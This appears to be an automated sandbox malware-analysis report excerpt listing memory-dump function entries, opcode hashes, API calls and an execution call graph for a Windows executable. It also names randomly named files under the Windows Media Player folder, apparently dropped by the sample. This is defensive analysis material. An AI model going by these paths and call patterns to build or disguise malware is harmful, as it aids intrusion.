                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                          • API String ID: 729085983-410509341
                                                                                                                                                                                                                                                                                          • Opcode ID: 4760260a9b486b8840c271b93fb85519dd309387c3402d518311e1abf3e79c7b
                                                                                                                                                                                                                                                                                          • Instruction ID: 392b18b8555a4f45085f6d6a2a502e2444faec63dbeb9aec88456f9c9e2f7990
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4760260a9b486b8840c271b93fb85519dd309387c3402d518311e1abf3e79c7b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7911A562A1EB4585EB48BF25E4463AC3390DF80BA4F105631D91C9B7DAEF7CE484E340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                                                                          • API String ID: 1838369231-1405518554
                                                                                                                                                                                                                                                                                          • Opcode ID: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                                                                                                                                          • Instruction ID: 3410ca80eb5c27f33c5971cba47a559f7262476237881f976a211c5e400bbd71
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A01AD23109BC1CAC784FF75A88119877A5FB28B88B289139CA8CC375AEF38C590C340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF643F5EEE6), ref: 00007FF643F64A10
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF643F5EEE6), ref: 00007FF643F64A51
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                          • Opcode ID: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                                                                                                                                          • Instruction ID: 57078518fd60def8c19f5cfee88bb255f82b62d0c9384661b9ee5476fed58ce9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7711603261CB8182EBA1AF15F44126A77E1FB88B84F184230DE8C57798DF3CC552D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                          • API String ID: 729085983-410509341
                                                                                                                                                                                                                                                                                          • Opcode ID: 7a46c075ae1c8417c0b4ef7169ee8afa7c9564350e8857d7f7ba50c4cd34cae0
                                                                                                                                                                                                                                                                                          • Instruction ID: e683c3c1f04f5d8726dfbac9f58a44f9d3b9efeda2bb4f68fa0d66b0581b2d72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a46c075ae1c8417c0b4ef7169ee8afa7c9564350e8857d7f7ba50c4cd34cae0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2711A172A29B8684EB59BF25E44A3EC3390EB41BA4F004231CA2C5B7D6DF3CD980D340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __std_fs_code_page.LIBCPMT ref: 00007FF643F42BDE
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$J
                                                                                                                                                                                                                                                                                          • API String ID: 1377543553-1822051254
                                                                                                                                                                                                                                                                                          • Opcode ID: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                                                                                                                                          • Instruction ID: e19d4a9bef4089972d0d5ef0da839144518e6d2c66df5a3cc4b6ecccad325b88
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78E04F56A187C6C2EA60AB14A4023AAA364FB9D308F040231EECC577A5EF3CD2858B45
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __std_fs_code_page.LIBCPMT ref: 00007FF643F42C2E
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$G
                                                                                                                                                                                                                                                                                          • API String ID: 1377543553-4099582714
                                                                                                                                                                                                                                                                                          • Opcode ID: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                                                                                                                                          • Instruction ID: e510c25d93d0edf93775ff18b492281507c7f5ba115efd78789eeef998be2a3f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0E0485591C7C5C1D660AB14B4023A9E354FB9C308F040231DFCC57765DF3CD2858B44

                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                          Execution Coverage:12%
                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:47
                                                                                                                                                                                                                                                                                          execution_graph 41456 7ff6845ad340 41457 7ff6845ad374 41456->41457 41464 7ff6845ad389 41456->41464 41483 7ff6845b1674 11 API calls _get_daylight 41457->41483 41459 7ff6845ad379 41484 7ff6845acd10 47 API calls _invalid_parameter_noinfo_noreturn 41459->41484 41462 7ff6845ad384 41486 7ff6845a2770 41462->41486 41475 7ff6845ad4b8 41464->41475 41476 7ff6845bd85c 41464->41476 41470 7ff6845ad66f 41507 7ff6845acd60 IsProcessorFeaturePresent 41470->41507 41475->41462 41485 7ff6845b1674 11 API calls _get_daylight 41475->41485 41477 7ff6845ad5d2 41476->41477 41478 7ff6845bd86b 41476->41478 41495 7ff6845bca00 41477->41495 41511 7ff6845b1f64 EnterCriticalSection 41478->41511 41483->41459 41484->41462 41485->41462 41487 7ff6845a2779 41486->41487 41488 7ff6845a27cc IsProcessorFeaturePresent 41487->41488 41489 7ff6845a2784 41487->41489 41490 7ff6845a27e4 41488->41490 41512 7ff6845a29c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41490->41512 41492 7ff6845a27f7 41513 7ff6845a2798 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41492->41513 41496 7ff6845ad5e3 41495->41496 41497 7ff6845bca09 41495->41497 41496->41470 41501 7ff6845bca30 41496->41501 41514 7ff6845b1674 11 API calls _get_daylight 41497->41514 41499 7ff6845bca0e 41515 7ff6845acd10 47 API calls _invalid_parameter_noinfo_noreturn 41499->41515 41502 7ff6845bca39 41501->41502 41503 7ff6845ad5f4 41501->41503 41516 7ff6845b1674 11 API calls _get_daylight 41502->41516 41503->41470 41503->41475 41505 7ff6845bca3e 41517 7ff6845acd10 47 API calls _invalid_parameter_noinfo_noreturn 41505->41517 41508 7ff6845acd73 41507->41508 41518 7ff6845aca44 14 API calls 3 library calls 41508->41518 41510 7ff6845acd8e GetCurrentProcess TerminateProcess 41512->41492 41514->41499 41515->41496 41516->41505 41517->41503 41518->41510 41519 7ff684598ce3 41526 7ff6845a2a38 41519->41526 41522 7ff6845a2a38 std::_Facet_Register 50 API calls 41523 7ff684598d1b 41522->41523 41536 7ff68459a300 41523->41536 41525 7ff684598d41 41525->41525 41530 7ff6845a2a43 41526->41530 41528 7ff684598ced 41528->41522 41530->41528 41531 7ff6845a2a62 41530->41531 41546 7ff6845b324c 41530->41546 41549 7ff6845adc28 41530->41549 41532 7ff6845a2a6d 41531->41532 41556 7ff68459eea4 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 41531->41556 41557 7ff684562370 50 API calls 2 library calls 41532->41557 41535 7ff6845a2a73 41537 7ff68459a3c2 41536->41537 41538 7ff68459a332 41536->41538 41537->41525 41539 7ff6845a2a38 std::_Facet_Register 50 API calls 41538->41539 41540 7ff68459a34a 41539->41540 41565 7ff684597910 41540->41565 41542 7ff68459a367 41574 7ff684597af0 41542->41574 41545 7ff68459a300 50 API calls 41545->41537 41558 7ff6845b328c 41546->41558 41554 7ff6845ba168 _get_daylight 41549->41554 41550 7ff6845ba1b3 41564 7ff6845b1674 11 API calls _get_daylight 41550->41564 41552 7ff6845ba19a HeapAlloc 41553 7ff6845ba1b1 41552->41553 41552->41554 41553->41530 41554->41550 41554->41552 41555 7ff6845b324c std::_Facet_Register 2 API calls 41554->41555 41555->41554 41557->41535 41563 7ff6845b1f64 EnterCriticalSection 41558->41563 41564->41553 41566 7ff684597937 41565->41566 41569 7ff684597965 codecvt 41565->41569 41567 7ff6845adc28 __std_exception_copy 12 API calls 41566->41567 41566->41569 41568 7ff68459795d 41567->41568 41568->41569 41578 7ff68457f4a0 41568->41578 41569->41542 41573 7ff6845979e7 41573->41542 41575 7ff684597b12 41574->41575 41605 7ff684598e50 41575->41605 41577 7ff684597b1d 41577->41545 41579 7ff68457f4c0 41578->41579 41579->41579 41583 7ff6845844a0 41579->41583 41581 7ff68457f4ce 41582 7ff684597770 50 API calls 3 library calls 41581->41582 41582->41573 41584 7ff684584594 41583->41584 41587 7ff6845844c6 41583->41587 41603 7ff684562410 50 API calls std::_Throw_Cpp_error 41584->41603 41588 7ff6845844cc codecvt 41587->41588 41589 7ff6845844fc 41587->41589 41590 7ff684584555 41587->41590 41588->41581 41591 7ff6845a2a38 std::_Facet_Register 50 API calls 41589->41591 41592 7ff68458458e 41589->41592 41593 7ff6845a2a38 std::_Facet_Register 50 API calls 41590->41593 41594 7ff684584512 41591->41594 41602 7ff684562370 50 API calls 2 library calls 41592->41602 41593->41588 41594->41588 41597 7ff6845acd30 41594->41597 41604 7ff6845acba8 47 API calls 2 library calls 41597->41604 41599 7ff6845acd49 41600 7ff6845acd60 _invalid_parameter_noinfo_noreturn 17 API calls 41599->41600 41601 7ff6845acd5e 41600->41601 41602->41584 41604->41599 41608 7ff684599dc0 41605->41608 41607 7ff684598e73 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 41607->41577 41609 7ff684599ded 41608->41609 41611 7ff684599df7 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 41608->41611 41610 7ff6845a2a38 std::_Facet_Register 50 API calls 41609->41610 41610->41611 41611->41607 41612 7ff6845a8635 41624 7ff6845a93f8 41612->41624 41629 7ff6845b6f84 GetLastError 41624->41629 41630 7ff6845b6fc5 FlsSetValue 41629->41630 41631 7ff6845b6fa8 FlsGetValue 41629->41631 41633 7ff6845b6fd7 41630->41633 41648 7ff6845b6fb5 41630->41648 41632 7ff6845b6fbf 41631->41632 41631->41648 41632->41630 41652 7ff6845b87c4 41633->41652 41634 7ff6845b7031 SetLastError 41636 7ff6845b7051 41634->41636 41637 7ff6845a9401 41634->41637 41668 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 41636->41668 41651 7ff6845b1774 47 API calls BuildCatchObjectHelperInternal 41637->41651 41640 7ff6845b7004 FlsSetValue 41643 7ff6845b7010 FlsSetValue 41640->41643 41644 7ff6845b7022 41640->41644 41641 7ff6845b6ff4 FlsSetValue 41642 7ff6845b6ffd 41641->41642 41661 7ff6845b8340 41642->41661 41643->41642 41667 7ff6845b6d34 11 API calls _get_daylight 41644->41667 41648->41634 41649 7ff6845b702a 41650 7ff6845b8340 __free_lconv_num 11 API calls 41649->41650 41650->41634 41653 7ff6845b87d5 41652->41653 41659 7ff6845b87e3 _get_daylight 41652->41659 41654 7ff6845b8826 41653->41654 41653->41659 41669 7ff6845b1674 11 API calls _get_daylight 41654->41669 41655 7ff6845b880a HeapAlloc 41657 7ff6845b8824 41655->41657 41655->41659 41658 7ff6845b6fe6 41657->41658 41658->41640 41658->41641 41659->41654 41659->41655 41660 7ff6845b324c std::_Facet_Register 2 API calls 41659->41660 41660->41659 41662 7ff6845b8345 RtlFreeHeap 41661->41662 41663 7ff6845b8374 41661->41663 41662->41663 41664 7ff6845b8360 GetLastError 41662->41664 41663->41648 41665 7ff6845b836d __free_lconv_num 41664->41665 41670 7ff6845b1674 11 API calls _get_daylight 41665->41670 41667->41649 41669->41658 41670->41663 41671 7ff6845a9078 41672 7ff6845a9095 41671->41672 41673 7ff6845a9086 GetLastError ExitThread 41671->41673 41674 7ff6845b6f84 _Getctype 47 API calls 41672->41674 41675 7ff6845a909a 41674->41675 41682 7ff6845b676c 41675->41682 41679 7ff6845a90b3 41686 7ff6845a928c 41679->41686 41683 7ff6845a90a6 41682->41683 41684 7ff6845b677b 41682->41684 41683->41679 41689 7ff6845b90ec 5 API calls __crtLCMapStringW 41683->41689 41684->41683 41690 7ff6845b8b04 5 API calls __crtLCMapStringW 41684->41690 41691 7ff6845a90e8 41686->41691 41689->41679 41690->41683 41700 7ff6845b70fc GetLastError 41691->41700 41693 7ff6845a9140 ExitThread 41694 7ff6845a90f9 41694->41693 41695 7ff6845a9115 41694->41695 41717 7ff6845b9138 5 API calls __crtLCMapStringW 41694->41717 41697 7ff6845a9123 CloseHandle 41695->41697 41698 7ff6845a9129 41695->41698 41697->41698 41698->41693 41699 7ff6845a9137 FreeLibraryAndExitThread 41698->41699 41699->41693 41701 7ff6845b7120 41700->41701 41702 7ff6845b713d FlsSetValue 41700->41702 41701->41702 41715 7ff6845b712d 41701->41715 41703 7ff6845b714f 41702->41703 41702->41715 41705 7ff6845b87c4 _get_daylight 5 API calls 41703->41705 41704 7ff6845b71a9 SetLastError 41704->41694 41706 7ff6845b715e 41705->41706 41707 7ff6845b717c FlsSetValue 41706->41707 41708 7ff6845b716c FlsSetValue 41706->41708 41710 7ff6845b7188 FlsSetValue 41707->41710 41711 7ff6845b719a 41707->41711 41709 7ff6845b7175 41708->41709 41713 7ff6845b8340 __free_lconv_num 5 API calls 41709->41713 41710->41709 41718 7ff6845b6d34 11 API calls _get_daylight 41711->41718 41713->41715 41714 7ff6845b71a2 41716 7ff6845b8340 __free_lconv_num 5 API calls 41714->41716 41715->41704 41716->41704 41717->41695 41718->41714 41719 7ff684598ca9 41720 7ff684598cc6 41719->41720 41721 7ff684598cb1 41719->41721 41721->41720 41723 7ff6845974c0 41721->41723 41724 7ff6845974f4 41723->41724 41725 7ff684597562 41723->41725 41726 7ff6845adc28 __std_exception_copy 12 API calls 41724->41726 41744 7ff684592d00 41725->41744 41727 7ff6845974fd 41726->41727 41729 7ff684597505 codecvt 41727->41729 41730 7ff684597546 41727->41730 41734 7ff6845a2770 codecvt 8 API calls 41729->41734 41731 7ff68457f4a0 50 API calls 41730->41731 41733 7ff684597557 41731->41733 41732 7ff684597577 41749 7ff684592c50 50 API calls 41732->41749 41743 7ff684597770 50 API calls 3 library calls 41733->41743 41736 7ff68459752e 41734->41736 41736->41720 41738 7ff684597598 41750 7ff684597870 50 API calls 3 library calls 41738->41750 41740 7ff6845975a1 41751 7ff6845975f0 47 API calls 2 library calls 41740->41751 41742 7ff6845975c4 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 41742->41720 41743->41725 41752 7ff684581370 41744->41752 41749->41738 41750->41740 41751->41742 41753 7ff6845a2a38 std::_Facet_Register 50 API calls 41752->41753 41754 7ff6845813cc 41753->41754 41768 7ff68459f0cc 41754->41768 41756 7ff684581456 41759 7ff684581463 41756->41759 41779 7ff6845a0a64 7 API calls 2 library calls 41756->41779 41757 7ff6845813dc 41757->41756 41758 7ff68458147e 41757->41758 41780 7ff6845a49c0 RtlPcToFileHeader RaiseException 41758->41780 41763 7ff684581080 41759->41763 41762 7ff6845814cf 41764 7ff6845a2a38 std::_Facet_Register 50 API calls 41763->41764 41765 7ff6845810f7 41764->41765 41766 7ff68459f0cc 58 API calls 41765->41766 41767 7ff684581107 41766->41767 41767->41732 41781 7ff68459eae4 41768->41781 41770 7ff68459f0ee 41778 7ff68459f150 codecvt 41770->41778 41789 7ff68459f2c4 50 API calls std::_Facet_Register 41770->41789 41773 7ff68459f106 41790 7ff68459f2f4 48 API calls std::locale::_Setgloballocale 41773->41790 41775 7ff68459f1a6 41775->41757 41776 7ff68459f111 __std_exception_copy 41777 7ff6845adc28 __std_exception_copy 12 API calls 41776->41777 41776->41778 41777->41778 41785 7ff68459eb5c 41778->41785 41779->41759 41780->41762 41782 7ff68459eaf3 41781->41782 41784 7ff68459eaf8 41781->41784 41791 7ff6845b1fd4 6 API calls std::_Locinfo::_Locinfo_ctor 41782->41791 41784->41770 41786 7ff68459eb67 LeaveCriticalSection 41785->41786 41788 7ff68459eb70 41785->41788 41788->41775 41789->41773 41790->41776 41792 7ff6845a3098 41815 7ff6845a2b80 41792->41815 41795 7ff6845a31e4 41837 7ff6845a36ec 7 API calls 2 library calls 41795->41837 41796 7ff6845a30b4 __scrt_acquire_startup_lock 41798 7ff6845a31ee 41796->41798 41805 7ff6845a30d2 __scrt_release_startup_lock 41796->41805 41838 7ff6845a36ec 7 API calls 2 library calls 41798->41838 41800 7ff6845a30f7 41801 7ff6845a31f9 BuildCatchObjectHelperInternal 41802 7ff6845a317d 41821 7ff6845a3834 41802->41821 41804 7ff6845a3182 41824 7ff6845b42e8 41804->41824 41805->41800 41805->41802 41834 7ff6845a8800 47 API calls __GSHandlerCheck_EH 41805->41834 41812 7ff6845a31a5 41812->41801 41836 7ff6845a2d04 7 API calls 41812->41836 41814 7ff6845a31bc 41814->41800 41816 7ff6845a2b88 41815->41816 41817 7ff6845a2b94 __scrt_dllmain_crt_thread_attach 41816->41817 41818 7ff6845a2b9d 41817->41818 41819 7ff6845a2ba1 41817->41819 41818->41795 41818->41796 41819->41818 41839 7ff6845a4cd0 7 API calls 2 library calls 41819->41839 41840 7ff6845c99f0 41821->41840 41842 7ff6845c1504 41824->41842 41826 7ff6845a318a 41829 7ff68457c760 41826->41829 41827 7ff6845b42f7 41827->41826 41848 7ff6845c1840 47 API calls TranslateName 41827->41848 41851 7ff6845783f0 41829->41851 41832 7ff6845a2770 codecvt 8 API calls 41833 7ff68457c788 41832->41833 41835 7ff6845a3878 GetModuleHandleW 41833->41835 41834->41802 41835->41812 41836->41814 41837->41798 41838->41801 41839->41818 41841 7ff6845a384b GetStartupInfoW 41840->41841 41841->41804 41843 7ff6845c1511 41842->41843 41844 7ff6845c1556 41842->41844 41849 7ff6845b7058 52 API calls 3 library calls 41843->41849 41844->41827 41846 7ff6845c1540 41850 7ff6845c11dc 67 API calls 3 library calls 41846->41850 41848->41827 41849->41846 41850->41844 41852 7ff68457841a std::_Locinfo::_Locinfo_ctor 41851->41852 42554 7ff68457f040 41852->42554 41861 7ff684581fe0 10 API calls 41862 7ff6845784b6 41861->41862 42599 7ff6845822a0 41862->42599 41865 7ff684578517 41870 7ff68457f4a0 50 API calls 41865->41870 41866 7ff6845784e5 41867 7ff68457f4a0 50 API calls 41866->41867 41868 7ff6845784f8 41867->41868 41869 7ff684565d00 47 API calls 41868->41869 41871 7ff684578500 41869->41871 41872 7ff684578536 41870->41872 41873 7ff684564550 47 API calls 41871->41873 41874 7ff68457f4a0 50 API calls 41872->41874 42550 7ff68457850d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 41873->42550 41875 7ff68457854a 41874->41875 41876 7ff68457f4a0 50 API calls 41875->41876 41878 7ff68457855e 41876->41878 41877 7ff6845a2770 codecvt 8 API calls 41879 7ff68457c2cb 41877->41879 42607 7ff68457eed0 41878->42607 41879->41832 41882 7ff68457f4a0 50 API calls 41883 7ff6845785b1 41882->41883 41884 7ff68457eed0 50 API calls 41883->41884 41885 7ff6845785f0 41884->41885 42617 7ff68457ece0 41885->42617 41888 7ff68457f4a0 50 API calls 41889 7ff684578659 41888->41889 41890 7ff68457f4a0 50 API calls 41889->41890 41891 7ff684578674 41890->41891 41892 7ff68457f4a0 50 API calls 41891->41892 41893 7ff684578688 41892->41893 41894 7ff68457eed0 50 API calls 41893->41894 41895 7ff6845786c7 41894->41895 41896 7ff68457f4a0 50 API calls 41895->41896 41897 7ff6845786d8 41896->41897 41898 7ff68457eed0 50 API calls 41897->41898 41899 7ff684578711 41898->41899 41900 7ff68457ece0 50 API calls 41899->41900 41901 7ff68457874a 41900->41901 41902 7ff68457f4a0 50 API calls 41901->41902 41903 7ff68457875e 41902->41903 41904 7ff68457f4a0 50 API calls 41903->41904 41905 7ff684578783 41904->41905 41906 7ff68457ece0 50 API calls 41905->41906 41907 7ff684578790 41906->41907 41908 7ff68457ece0 50 API calls 41907->41908 41909 7ff68457879d 41908->41909 41910 7ff68457f4a0 50 API calls 41909->41910 41911 7ff6845787e8 41910->41911 42620 7ff684582960 41911->42620 41914 7ff68457f4a0 50 API calls 41915 7ff684578817 41914->41915 41916 7ff68457f4a0 50 API calls 41915->41916 41917 7ff68457882b 41916->41917 41918 7ff68457f4a0 50 API calls 41917->41918 41919 7ff68457883f 41918->41919 41920 7ff68457eed0 50 API calls 41919->41920 41921 7ff68457887e 41920->41921 41922 7ff68457f4a0 50 API calls 41921->41922 41923 7ff68457888f 41922->41923 41924 7ff68457eed0 50 API calls 41923->41924 41925 7ff6845788c8 41924->41925 41926 7ff68457ece0 50 API calls 41925->41926 41927 7ff6845788f2 41926->41927 41928 7ff68457f4a0 50 API calls 41927->41928 41929 7ff684578931 41928->41929 41930 7ff68457f4a0 50 API calls 41929->41930 41931 7ff68457894c 41930->41931 41932 7ff68457f4a0 50 API calls 41931->41932 41933 7ff684578960 41932->41933 41934 7ff68457eed0 50 API calls 41933->41934 41935 7ff68457899f 41934->41935 41936 7ff68457f4a0 50 API calls 41935->41936 41937 7ff6845789b0 41936->41937 41938 7ff68457eed0 50 API calls 41937->41938 41939 7ff6845789e9 41938->41939 41940 7ff68457ece0 50 API calls 41939->41940 41941 7ff684578a22 41940->41941 41942 7ff68457f4a0 50 API calls 41941->41942 41943 7ff684578a36 